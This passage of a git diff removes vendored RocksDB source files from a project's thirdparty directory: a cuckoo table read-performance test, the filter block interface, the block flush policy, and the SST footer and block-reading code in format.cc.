-      kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint64_t key_idx = 0; key_idx < num; ++key_idx) {
-    // Value is just a part of key.
-    builder.Add(Slice(keys[key_idx]), Slice(&keys[key_idx][0], 4));
-    ASSERT_EQ(builder.NumEntries(), key_idx + 1);
-    ASSERT_OK(builder.status());
-  }
-  ASSERT_OK(builder.Finish());
-  ASSERT_EQ(num, builder.NumEntries());
-  ASSERT_OK(file_writer->Close());
-
-  uint64_t file_size;
-  env->GetFileSize(fname, &file_size);
-  std::unique_ptr<RandomAccessFile> read_file;
-  ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-  unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(read_file), fname));
-
-  const ImmutableCFOptions ioptions(options);
-  CuckooTableReader reader(ioptions, std::move(file_reader), file_size,
-                           test::Uint64Comparator(), nullptr);
-  ASSERT_OK(reader.status());
-  ReadOptions r_options;
-  PinnableSlice value;
-  // Assume only the fast path is triggered
-  GetContext get_context(nullptr, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, Slice(), &value, nullptr,
-                         nullptr, nullptr, nullptr);
-  for (uint64_t i = 0; i < num; ++i) {
-    value.Reset();
-    value.clear();
-    ASSERT_OK(reader.Get(r_options, Slice(keys[i]), &get_context));
-    ASSERT_TRUE(Slice(keys[i]) == Slice(&keys[i][0], 4));
-  }
-}
-
-void ReadKeys(uint64_t num, uint32_t batch_size) {
-  Options options;
-  options.allow_mmap_reads = true;
-  Env* env = options.env;
-  EnvOptions env_options = EnvOptions(options);
-  std::string fname = GetFileName(num);
-
-  uint64_t file_size;
-  env->GetFileSize(fname, &file_size);
-  std::unique_ptr<RandomAccessFile> read_file;
-  ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-  unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(read_file), fname));
-
-  const ImmutableCFOptions ioptions(options);
-  CuckooTableReader reader(ioptions, std::move(file_reader), file_size,
-                           test::Uint64Comparator(), nullptr);
-  ASSERT_OK(reader.status());
-  const UserCollectedProperties user_props =
-    reader.GetTableProperties()->user_collected_properties;
-  const uint32_t num_hash_fun = *reinterpret_cast<const uint32_t*>(
-      user_props.at(CuckooTablePropertyNames::kNumHashFunc).data());
-  const uint64_t table_size = *reinterpret_cast<const uint64_t*>(
-      user_props.at(CuckooTablePropertyNames::kHashTableSize).data());
-  fprintf(stderr, "With %" PRIu64 " items, utilization is %.2f%%, number of"
-      " hash functions: %u.\n", num, num * 100.0 / (table_size), num_hash_fun);
-  ReadOptions r_options;
-
-  std::vector<uint64_t> keys;
-  keys.reserve(num);
-  for (uint64_t i = 0; i < num; ++i) {
-    keys.push_back(2 * i);
-  }
-  std::random_shuffle(keys.begin(), keys.end());
-
-  PinnableSlice value;
-  // Assume only the fast path is triggered
-  GetContext get_context(nullptr, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, Slice(), &value, nullptr,
-                         nullptr, nullptr, nullptr);
-  uint64_t start_time = env->NowMicros();
-  if (batch_size > 0) {
-    for (uint64_t i = 0; i < num; i += batch_size) {
-      for (uint64_t j = i; j < i+batch_size && j < num; ++j) {
-        reader.Prepare(Slice(reinterpret_cast<char*>(&keys[j]), 16));
-      }
-      for (uint64_t j = i; j < i+batch_size && j < num; ++j) {
-        reader.Get(r_options, Slice(reinterpret_cast<char*>(&keys[j]), 16),
-                   &get_context);
-      }
-    }
-  } else {
-    for (uint64_t i = 0; i < num; i++) {
-      reader.Get(r_options, Slice(reinterpret_cast<char*>(&keys[i]), 16),
-                 &get_context);
-    }
-  }
-  float time_per_op = (env->NowMicros() - start_time) * 1.0f / num;
-  fprintf(stderr,
-      "Time taken per op is %.3fus (%.1f Mqps) with batch size of %u\n",
-      time_per_op, 1.0 / time_per_op, batch_size);
-}
-}  // namespace.
-
-TEST_F(CuckooReaderTest, TestReadPerformance) {
-  if (!FLAGS_enable_perf) {
-    return;
-  }
-  double hash_ratio = 0.95;
-  // These numbers are chosen to have a hash utilization % close to
-  // 0.9, 0.75, 0.6 and 0.5 respectively.
-  // They all create 128 M buckets.
-  std::vector<uint64_t> nums = {120*1024*1024, 100*1024*1024, 80*1024*1024,
-    70*1024*1024};
-#ifndef NDEBUG
-  fprintf(stdout,
-      "WARNING: Not compiled with DNDEBUG. Performance tests may be slow.\n");
-#endif
-  for (uint64_t num : nums) {
-    if (FLAGS_write ||
-        Env::Default()->FileExists(GetFileName(num)).IsNotFound()) {
-      std::vector<std::string> all_keys;
-      GetKeys(num, &all_keys);
-      WriteFile(all_keys, num, hash_ratio);
-    }
-    ReadKeys(num, 0);
-    ReadKeys(num, 10);
-    ReadKeys(num, 25);
-    ReadKeys(num, 50);
-    ReadKeys(num, 100);
-    fprintf(stderr, "\n");
-  }
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  if (rocksdb::port::kLittleEndian) {
-    ::testing::InitGoogleTest(&argc, argv);
-    ParseCommandLineFlags(&argc, &argv, true);
-    return RUN_ALL_TESTS();
-  }
-  else {
-    fprintf(stderr, "SKIPPED as Cuckoo table doesn't support Big Endian\n");
-    return 0;
-  }
-}
-
-#endif  // GFLAGS.
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Cuckoo table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/filter_block.h b/thirdparty/rocksdb/table/filter_block.h
deleted file mode 100644
index 7bf3b31..0000000
--- a/thirdparty/rocksdb/table/filter_block.h
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A filter block is stored near the end of a Table file.  It contains
-// filters (e.g., bloom filters) for all data blocks in the table combined
-// into a single filter block.
-//
-// It is a base class for BlockBasedFilter and FullFilter.
-// These two are both used in BlockBasedTable. The first one contain filter
-// For a part of keys in sst file, the second contain filter for all keys
-// in sst file.
-
-#pragma once
-
-#include <memory>
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "util/hash.h"
-#include "format.h"
-
-namespace rocksdb {
-
-const uint64_t kNotValid = ULLONG_MAX;
-class FilterPolicy;
-
-// A FilterBlockBuilder is used to construct all of the filters for a
-// particular Table.  It generates a single string which is stored as
-// a special block in the Table.
-//
-// The sequence of calls to FilterBlockBuilder must match the regexp:
-//      (StartBlock Add*)* Finish
-//
-// BlockBased/Full FilterBlock would be called in the same way.
-class FilterBlockBuilder {
- public:
-  explicit FilterBlockBuilder() {}
-  virtual ~FilterBlockBuilder() {}
-
-  virtual bool IsBlockBased() = 0;                    // If is blockbased filter
-  virtual void StartBlock(uint64_t block_offset) = 0;  // Start new block filter
-  virtual void Add(const Slice& key) = 0;      // Add a key to current filter
-  Slice Finish() {                             // Generate Filter
-    const BlockHandle empty_handle;
-    Status dont_care_status;
-    auto ret = Finish(empty_handle, &dont_care_status);
-    assert(dont_care_status.ok());
-    return ret;
-  }
-  virtual Slice Finish(const BlockHandle& tmp, Status* status) = 0;
-
- private:
-  // No copying allowed
-  FilterBlockBuilder(const FilterBlockBuilder&);
-  void operator=(const FilterBlockBuilder&);
-};
-
-// A FilterBlockReader is used to parse filter from SST table.
-// KeyMayMatch and PrefixMayMatch would trigger filter checking
-//
-// BlockBased/Full FilterBlock would be called in the same way.
-class FilterBlockReader {
- public:
-  explicit FilterBlockReader()
-      : whole_key_filtering_(true), size_(0), statistics_(nullptr) {}
-  explicit FilterBlockReader(size_t s, Statistics* stats,
-                             bool _whole_key_filtering)
-      : whole_key_filtering_(_whole_key_filtering),
-        size_(s),
-        statistics_(stats) {}
-  virtual ~FilterBlockReader() {}
-
-  virtual bool IsBlockBased() = 0;  // If is blockbased filter
-  /**
-   * If no_io is set, then it returns true if it cannot answer the query without
-   * reading data from disk. This is used in PartitionedFilterBlockReader to
-   * avoid reading partitions that are not in block cache already
-   *
-   * Normally filters are built on only the user keys and the InternalKey is not
-   * needed for a query. The index in PartitionedFilterBlockReader however is
-   * built upon InternalKey and must be provided via const_ikey_ptr when running
-   * queries.
-   */
-  virtual bool KeyMayMatch(const Slice& key, uint64_t block_offset = kNotValid,
-                           const bool no_io = false,
-                           const Slice* const const_ikey_ptr = nullptr) = 0;
-  /**
-   * no_io and const_ikey_ptr here means the same as in KeyMayMatch
-   */
-  virtual bool PrefixMayMatch(const Slice& prefix,
-                              uint64_t block_offset = kNotValid,
-                              const bool no_io = false,
-                              const Slice* const const_ikey_ptr = nullptr) = 0;
-  virtual size_t ApproximateMemoryUsage() const = 0;
-  virtual size_t size() const { return size_; }
-  virtual Statistics* statistics() const { return statistics_; }
-
-  bool whole_key_filtering() const { return whole_key_filtering_; }
-
-  // convert this object to a human readable form
-  virtual std::string ToString() const {
-    std::string error_msg("Unsupported filter \n");
-    return error_msg;
-  }
-
-  virtual void CacheDependencies(bool pin) {}
-
- protected:
-  bool whole_key_filtering_;
-
- private:
-  // No copying allowed
-  FilterBlockReader(const FilterBlockReader&);
-  void operator=(const FilterBlockReader&);
-  size_t size_;
-  Statistics* statistics_;
-  int level_ = -1;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/flush_block_policy.cc b/thirdparty/rocksdb/table/flush_block_policy.cc
deleted file mode 100644
index 9a8dea4..0000000
--- a/thirdparty/rocksdb/table/flush_block_policy.cc
+++ /dev/null
@@ -1,80 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/options.h"
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/slice.h"
-#include "table/block_builder.h"
-
-#include <cassert>
-
-namespace rocksdb {
-
-// Flush block by size
-class FlushBlockBySizePolicy : public FlushBlockPolicy {
- public:
-  // @params block_size:           Approximate size of user data packed per
-  //                               block.
-  // @params block_size_deviation: This is used to close a block before it
-  //                               reaches the configured
-  FlushBlockBySizePolicy(const uint64_t block_size,
-                         const uint64_t block_size_deviation,
-                         const BlockBuilder& data_block_builder)
-      : block_size_(block_size),
-        block_size_deviation_limit_(
-            ((block_size * (100 - block_size_deviation)) + 99) / 100),
-        data_block_builder_(data_block_builder) {}
-
-  virtual bool Update(const Slice& key,
-                      const Slice& value) override {
-    // it makes no sense to flush when the data block is empty
-    if (data_block_builder_.empty()) {
-      return false;
-    }
-
-    auto curr_size = data_block_builder_.CurrentSizeEstimate();
-
-    // Do flush if one of the below two conditions is true:
-    // 1) if the current estimated size already exceeds the block size,
-    // 2) block_size_deviation is set and the estimated size after appending
-    // the kv will exceed the block size and the current size is under the
-    // the deviation.
-    return curr_size >= block_size_ || BlockAlmostFull(key, value);
-  }
-
- private:
-  bool BlockAlmostFull(const Slice& key, const Slice& value) const {
-    if (block_size_deviation_limit_ == 0) {
-      return false;
-    }
-
-    const auto curr_size = data_block_builder_.CurrentSizeEstimate();
-    const auto estimated_size_after =
-      data_block_builder_.EstimateSizeAfterKV(key, value);
-
-    return estimated_size_after > block_size_ &&
-           curr_size > block_size_deviation_limit_;
-  }
-
-  const uint64_t block_size_;
-  const uint64_t block_size_deviation_limit_;
-  const BlockBuilder& data_block_builder_;
-};
-
-FlushBlockPolicy* FlushBlockBySizePolicyFactory::NewFlushBlockPolicy(
-    const BlockBasedTableOptions& table_options,
-    const BlockBuilder& data_block_builder) const {
-  return new FlushBlockBySizePolicy(
-      table_options.block_size, table_options.block_size_deviation,
-      data_block_builder);
-}
-
-FlushBlockPolicy* FlushBlockBySizePolicyFactory::NewFlushBlockPolicy(
-    const uint64_t size, const int deviation,
-    const BlockBuilder& data_block_builder) {
-  return new FlushBlockBySizePolicy(size, deviation, data_block_builder);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/format.cc b/thirdparty/rocksdb/table/format.cc
deleted file mode 100644
index 364766e..0000000
--- a/thirdparty/rocksdb/table/format.cc
+++ /dev/null
@@ -1,595 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/format.h"
-
-#include <string>
-#include <inttypes.h>
-
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/env.h"
-#include "table/block.h"
-#include "table/block_based_table_reader.h"
-#include "table/persistent_cache_helper.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/logging.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/xxhash.h"
-
-namespace rocksdb {
-
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kBlockBasedTableMagicNumber;
-
-#ifndef ROCKSDB_LITE
-extern const uint64_t kLegacyPlainTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-#else
-// ROCKSDB_LITE doesn't have plain table
-const uint64_t kLegacyPlainTableMagicNumber = 0;
-const uint64_t kPlainTableMagicNumber = 0;
-#endif
-const uint32_t DefaultStackBufferSize = 5000;
-
-bool ShouldReportDetailedTime(Env* env, Statistics* stats) {
-  return env != nullptr && stats != nullptr &&
-         stats->stats_level_ > kExceptDetailedTimers;
-}
-
-void BlockHandle::EncodeTo(std::string* dst) const {
-  // Sanity check that all fields have been set
-  assert(offset_ != ~static_cast<uint64_t>(0));
-  assert(size_ != ~static_cast<uint64_t>(0));
-  PutVarint64Varint64(dst, offset_, size_);
-}
-
-Status BlockHandle::DecodeFrom(Slice* input) {
-  if (GetVarint64(input, &offset_) &&
-      GetVarint64(input, &size_)) {
-    return Status::OK();
-  } else {
-    // reset in case failure after partially decoding
-    offset_ = 0;
-    size_ = 0;
-    return Status::Corruption("bad block handle");
-  }
-}
-
-// Return a string that contains the copy of handle.
-std::string BlockHandle::ToString(bool hex) const {
-  std::string handle_str;
-  EncodeTo(&handle_str);
-  if (hex) {
-    return Slice(handle_str).ToString(true);
-  } else {
-    return handle_str;
-  }
-}
-
-const BlockHandle BlockHandle::kNullBlockHandle(0, 0);
-
-namespace {
-inline bool IsLegacyFooterFormat(uint64_t magic_number) {
-  return magic_number == kLegacyBlockBasedTableMagicNumber ||
-         magic_number == kLegacyPlainTableMagicNumber;
-}
-inline uint64_t UpconvertLegacyFooterFormat(uint64_t magic_number) {
-  if (magic_number == kLegacyBlockBasedTableMagicNumber) {
-    return kBlockBasedTableMagicNumber;
-  }
-  if (magic_number == kLegacyPlainTableMagicNumber) {
-    return kPlainTableMagicNumber;
-  }
-  assert(false);
-  return 0;
-}
-}  // namespace
-
-// legacy footer format:
-//    metaindex handle (varint64 offset, varint64 size)
-//    index handle     (varint64 offset, varint64 size)
-//    <padding> to make the total size 2 * BlockHandle::kMaxEncodedLength
-//    table_magic_number (8 bytes)
-// new footer format:
-//    checksum type (char, 1 byte)
-//    metaindex handle (varint64 offset, varint64 size)
-//    index handle     (varint64 offset, varint64 size)
-//    <padding> to make the total size 2 * BlockHandle::kMaxEncodedLength + 1
-//    footer version (4 bytes)
-//    table_magic_number (8 bytes)
-void Footer::EncodeTo(std::string* dst) const {
-  assert(HasInitializedTableMagicNumber());
-  if (IsLegacyFooterFormat(table_magic_number())) {
-    // has to be default checksum with legacy footer
-    assert(checksum_ == kCRC32c);
-    const size_t original_size = dst->size();
-    metaindex_handle_.EncodeTo(dst);
-    index_handle_.EncodeTo(dst);
-    dst->resize(original_size + 2 * BlockHandle::kMaxEncodedLength);  // Padding
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() & 0xffffffffu));
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() >> 32));
-    assert(dst->size() == original_size + kVersion0EncodedLength);
-  } else {
-    const size_t original_size = dst->size();
-    dst->push_back(static_cast<char>(checksum_));
-    metaindex_handle_.EncodeTo(dst);
-    index_handle_.EncodeTo(dst);
-    dst->resize(original_size + kNewVersionsEncodedLength - 12);  // Padding
-    PutFixed32(dst, version());
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() & 0xffffffffu));
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() >> 32));
-    assert(dst->size() == original_size + kNewVersionsEncodedLength);
-  }
-}
-
-Footer::Footer(uint64_t _table_magic_number, uint32_t _version)
-    : version_(_version),
-      checksum_(kCRC32c),
-      table_magic_number_(_table_magic_number) {
-  // This should be guaranteed by constructor callers
-  assert(!IsLegacyFooterFormat(_table_magic_number) || version_ == 0);
-}
-
-Status Footer::DecodeFrom(Slice* input) {
-  assert(!HasInitializedTableMagicNumber());
-  assert(input != nullptr);
-  assert(input->size() >= kMinEncodedLength);
-
-  const char *magic_ptr =
-      input->data() + input->size() - kMagicNumberLengthByte;
-  const uint32_t magic_lo = DecodeFixed32(magic_ptr);
-  const uint32_t magic_hi = DecodeFixed32(magic_ptr + 4);
-  uint64_t magic = ((static_cast<uint64_t>(magic_hi) << 32) |
-                    (static_cast<uint64_t>(magic_lo)));
-
-  // We check for legacy formats here and silently upconvert them
-  bool legacy = IsLegacyFooterFormat(magic);
-  if (legacy) {
-    magic = UpconvertLegacyFooterFormat(magic);
-  }
-  set_table_magic_number(magic);
-
-  if (legacy) {
-    // The size is already asserted to be at least kMinEncodedLength
-    // at the beginning of the function
-    input->remove_prefix(input->size() - kVersion0EncodedLength);
-    version_ = 0 /* legacy */;
-    checksum_ = kCRC32c;
-  } else {
-    version_ = DecodeFixed32(magic_ptr - 4);
-    // Footer version 1 and higher will always occupy exactly this many bytes.
-    // It consists of the checksum type, two block handles, padding,
-    // a version number, and a magic number
-    if (input->size() < kNewVersionsEncodedLength) {
-      return Status::Corruption("input is too short to be an sstable");
-    } else {
-      input->remove_prefix(input->size() - kNewVersionsEncodedLength);
-    }
-    uint32_t chksum;
-    if (!GetVarint32(input, &chksum)) {
-      return Status::Corruption("bad checksum type");
-    }
-    checksum_ = static_cast<ChecksumType>(chksum);
-  }
-
-  Status result = metaindex_handle_.DecodeFrom(input);
-  if (result.ok()) {
-    result = index_handle_.DecodeFrom(input);
-  }
-  if (result.ok()) {
-    // We skip over any leftover data (just padding for now) in "input"
-    const char* end = magic_ptr + kMagicNumberLengthByte;
-    *input = Slice(end, input->data() + input->size() - end);
-  }
-  return result;
-}
-
-std::string Footer::ToString() const {
-  std::string result, handle_;
-  result.reserve(1024);
-
-  bool legacy = IsLegacyFooterFormat(table_magic_number_);
-  if (legacy) {
-    result.append("metaindex handle: " + metaindex_handle_.ToString() + "\n  ");
-    result.append("index handle: " + index_handle_.ToString() + "\n  ");
-    result.append("table_magic_number: " +
-                  rocksdb::ToString(table_magic_number_) + "\n  ");
-  } else {
-    result.append("checksum: " + rocksdb::ToString(checksum_) + "\n  ");
-    result.append("metaindex handle: " + metaindex_handle_.ToString() + "\n  ");
-    result.append("index handle: " + index_handle_.ToString() + "\n  ");
-    result.append("footer version: " + rocksdb::ToString(version_) + "\n  ");
-    result.append("table_magic_number: " +
-                  rocksdb::ToString(table_magic_number_) + "\n  ");
-  }
-  return result;
-}
-
-Status ReadFooterFromFile(RandomAccessFileReader* file,
-                          FilePrefetchBuffer* prefetch_buffer,
-                          uint64_t file_size, Footer* footer,
-                          uint64_t enforce_table_magic_number) {
-  if (file_size < Footer::kMinEncodedLength) {
-    return Status::Corruption(
-      "file is too short (" + ToString(file_size) + " bytes) to be an "
-      "sstable: " + file->file_name());
-  }
-
-  char footer_space[Footer::kMaxEncodedLength];
-  Slice footer_input;
-  size_t read_offset =
-      (file_size > Footer::kMaxEncodedLength)
-          ? static_cast<size_t>(file_size - Footer::kMaxEncodedLength)
-          : 0;
-  Status s;
-  if (prefetch_buffer == nullptr ||
-      !prefetch_buffer->TryReadFromCache(read_offset, Footer::kMaxEncodedLength,
-                                         &footer_input)) {
-    s = file->Read(read_offset, Footer::kMaxEncodedLength, &footer_input,
-                   footer_space);
-    if (!s.ok()) return s;
-  }
-
-  // Check that we actually read the whole footer from the file. It may be
-  // that size isn't correct.
-  if (footer_input.size() < Footer::kMinEncodedLength) {
-    return Status::Corruption(
-      "file is too short (" + ToString(file_size) + " bytes) to be an "
-      "sstable" + file->file_name());
-  }
-
-  s = footer->DecodeFrom(&footer_input);
-  if (!s.ok()) {
-    return s;
-  }
-  if (enforce_table_magic_number != 0 &&
-      enforce_table_magic_number != footer->table_magic_number()) {
-    return Status::Corruption(
-      "Bad table magic number: expected "
-      + ToString(enforce_table_magic_number) + ", found "
-      + ToString(footer->table_magic_number())
-      + " in " + file->file_name());
-  }
-  return Status::OK();
-}
-
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace {
-Status CheckBlockChecksum(const ReadOptions& options, const Footer& footer,
-                          const Slice& contents, size_t block_size,
-                          RandomAccessFileReader* file,
-                          const BlockHandle& handle) {
-  Status s;
-  // Check the crc of the type and the block contents
-  if (options.verify_checksums) {
-    const char* data = contents.data();  // Pointer to where Read put the data
-    PERF_TIMER_GUARD(block_checksum_time);
-    uint32_t value = DecodeFixed32(data + block_size + 1);
-    uint32_t actual = 0;
-    switch (footer.checksum()) {
-      case kNoChecksum:
-        break;
-      case kCRC32c:
-        value = crc32c::Unmask(value);
-        actual = crc32c::Value(data, block_size + 1);
-        break;
-      case kxxHash:
-        actual = XXH32(data, static_cast<int>(block_size) + 1, 0);
-        break;
-      default:
-        s = Status::Corruption(
-            "unknown checksum type " + ToString(footer.checksum()) + " in " +
-            file->file_name() + " offset " + ToString(handle.offset()) +
-            " size " + ToString(block_size));
-    }
-    if (s.ok() && actual != value) {
-      s = Status::Corruption(
-          "block checksum mismatch: expected " + ToString(actual) + ", got " +
-          ToString(value) + "  in " + file->file_name() + " offset " +
-          ToString(handle.offset()) + " size " + ToString(block_size));
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return s;
-}
-
-// Read a block and check its CRC
-// contents is the result of reading.
-// According to the implementation of file->Read, contents may not point to buf
-Status ReadBlock(RandomAccessFileReader* file, const Footer& footer,
-                 const ReadOptions& options, const BlockHandle& handle,
-                 Slice* contents, /* result of reading */ char* buf) {
-  size_t n = static_cast<size_t>(handle.size());
-  Status s;
-
-  {
-    PERF_TIMER_GUARD(block_read_time);
-    s = file->Read(handle.offset(), n + kBlockTrailerSize, contents, buf);
-  }
-
-  PERF_COUNTER_ADD(block_read_count, 1);
-  PERF_COUNTER_ADD(block_read_byte, n + kBlockTrailerSize);
-
-  if (!s.ok()) {
-    return s;
-  }
-  if (contents->size() != n + kBlockTrailerSize) {
-    return Status::Corruption("truncated block read from " + file->file_name() +
-                              " offset " + ToString(handle.offset()) +
-                              ", expected " + ToString(n + kBlockTrailerSize) +
-                              " bytes, got " + ToString(contents->size()));
-  }
-  return CheckBlockChecksum(options, footer, *contents, n, file, handle);
-}
-
-}  // namespace
-
-Status ReadBlockContents(RandomAccessFileReader* file,
-                         FilePrefetchBuffer* prefetch_buffer,
-                         const Footer& footer, const ReadOptions& read_options,
-                         const BlockHandle& handle, BlockContents* contents,
-                         const ImmutableCFOptions& ioptions,
-                         bool decompression_requested,
-                         const Slice& compression_dict,
-                         const PersistentCacheOptions& cache_options) {
-  Status status;
-  Slice slice;
-  size_t n = static_cast<size_t>(handle.size());
-  std::unique_ptr<char[]> heap_buf;
-  char stack_buf[DefaultStackBufferSize];
-  char* used_buf = nullptr;
-  rocksdb::CompressionType compression_type;
-
-  if (cache_options.persistent_cache &&
-      !cache_options.persistent_cache->IsCompressed()) {
-    status = PersistentCacheHelper::LookupUncompressedPage(cache_options,
-                                                           handle, contents);
-    if (status.ok()) {
-      // uncompressed page is found for the block handle
-      return status;
-    } else {
-      // uncompressed page is not found
-      if (ioptions.info_log && !status.IsNotFound()) {
-        assert(!status.ok());
-        ROCKS_LOG_INFO(ioptions.info_log,
-                       "Error reading from persistent cache. %s",
-                       status.ToString().c_str());
-      }
-    }
-  }
-
-  bool got_from_prefetch_buffer = false;
-  if (prefetch_buffer != nullptr &&
-      prefetch_buffer->TryReadFromCache(
-          handle.offset(),
-          static_cast<size_t>(handle.size()) + kBlockTrailerSize, &slice)) {
-    status =
-        CheckBlockChecksum(read_options, footer, slice,
-                           static_cast<size_t>(handle.size()), file, handle);
-    if (!status.ok()) {
-      return status;
-    }
-    got_from_prefetch_buffer = true;
-    used_buf = const_cast<char*>(slice.data());
-  } else if (cache_options.persistent_cache &&
-             cache_options.persistent_cache->IsCompressed()) {
-    // lookup uncompressed cache mode p-cache
-    status = PersistentCacheHelper::LookupRawPage(
-        cache_options, handle, &heap_buf, n + kBlockTrailerSize);
-  } else {
-    status = Status::NotFound();
-  }
-
-  if (!got_from_prefetch_buffer) {
-    if (status.ok()) {
-      // cache hit
-      used_buf = heap_buf.get();
-      slice = Slice(heap_buf.get(), n);
-    } else {
-      if (ioptions.info_log && !status.IsNotFound()) {
-        assert(!status.ok());
-        ROCKS_LOG_INFO(ioptions.info_log,
-                       "Error reading from persistent cache. %s",
-                       status.ToString().c_str());
-      }
-      // cache miss read from device
-      if (decompression_requested &&
-          n + kBlockTrailerSize < DefaultStackBufferSize) {
-        // If we've got a small enough hunk of data, read it in to the
-        // trivially allocated stack buffer instead of needing a full malloc()
-        used_buf = &stack_buf[0];
-      } else {
-        heap_buf = std::unique_ptr<char[]>(new char[n + kBlockTrailerSize]);
-        used_buf = heap_buf.get();
-      }
-
-      status = ReadBlock(file, footer, read_options, handle, &slice, used_buf);
-      if (status.ok() && read_options.fill_cache &&
-          cache_options.persistent_cache &&
-          cache_options.persistent_cache->IsCompressed()) {
-        // insert to raw cache
-        PersistentCacheHelper::InsertRawPage(cache_options, handle, used_buf,
-                                             n + kBlockTrailerSize);
-      }
-    }
-
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  PERF_TIMER_GUARD(block_decompress_time);
-
-  compression_type = static_cast<rocksdb::CompressionType>(slice.data()[n]);
-
-  if (decompression_requested && compression_type != kNoCompression) {
-    // compressed page, uncompress, update cache
-    status = UncompressBlockContents(slice.data(), n, contents,
-                                     footer.version(), compression_dict,
-                                     ioptions);
-  } else if (slice.data() != used_buf) {
-    // the slice content is not the buffer provided
-    *contents = BlockContents(Slice(slice.data(), n), false, compression_type);
-  } else {
-    // page is uncompressed, the buffer either stack or heap provided
-    if (got_from_prefetch_buffer || used_buf == &stack_buf[0]) {
-      heap_buf = std::unique_ptr<char[]>(new char[n]);
-      memcpy(heap_buf.get(), used_buf, n);
-    }
-    *contents = BlockContents(std::move(heap_buf), n, true, compression_type);
-  }
-
-  if (status.ok() && !got_from_prefetch_buffer && read_options.fill_cache &&
-      cache_options.persistent_cache &&
-      !cache_options.persistent_cache->IsCompressed()) {
-    // insert to uncompressed cache
-    PersistentCacheHelper::InsertUncompressedPage(cache_options, handle,
-                                                  *contents);
-  }
-
-  return status;
-}
-
-Status UncompressBlockContentsForCompressionType(
-    const char* data, size_t n, BlockContents* contents,
-    uint32_t format_version, const Slice& compression_dict,
-    CompressionType compression_type, const ImmutableCFOptions &ioptions) {
-  std::unique_ptr<char[]> ubuf;
-
-  assert(compression_type != kNoCompression && "Invalid compression type");
-
-  StopWatchNano timer(ioptions.env,
-    ShouldReportDetailedTime(ioptions.env, ioptions.statistics));
-  int decompress_size = 0;
-  switch (compression_type) {
-    case kSnappyCompression: {
-      size_t ulength = 0;
-      static char snappy_corrupt_msg[] =
-        "Snappy not supported or corrupted Snappy compressed block contents";
-      if (!Snappy_GetUncompressedLength(data, n, &ulength)) {
-        return Status::Corruption(snappy_corrupt_msg);
-      }
-      ubuf.reset(new char[ulength]);
-      if (!Snappy_Uncompress(data, n, ubuf.get())) {
-        return Status::Corruption(snappy_corrupt_msg);
-      }
-      *contents = BlockContents(std::move(ubuf), ulength, true, kNoCompression);
-      break;
-    }
-    case kZlibCompression:
-      ubuf.reset(Zlib_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kZlibCompression, format_version),
-          compression_dict));
-      if (!ubuf) {
-        static char zlib_corrupt_msg[] =
-          "Zlib not supported or corrupted Zlib compressed block contents";
-        return Status::Corruption(zlib_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kBZip2Compression:
-      ubuf.reset(BZip2_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kBZip2Compression, format_version)));
-      if (!ubuf) {
-        static char bzip2_corrupt_msg[] =
-          "Bzip2 not supported or corrupted Bzip2 compressed block contents";
-        return Status::Corruption(bzip2_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kLZ4Compression:
-      ubuf.reset(LZ4_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kLZ4Compression, format_version),
-          compression_dict));
-      if (!ubuf) {
-        static char lz4_corrupt_msg[] =
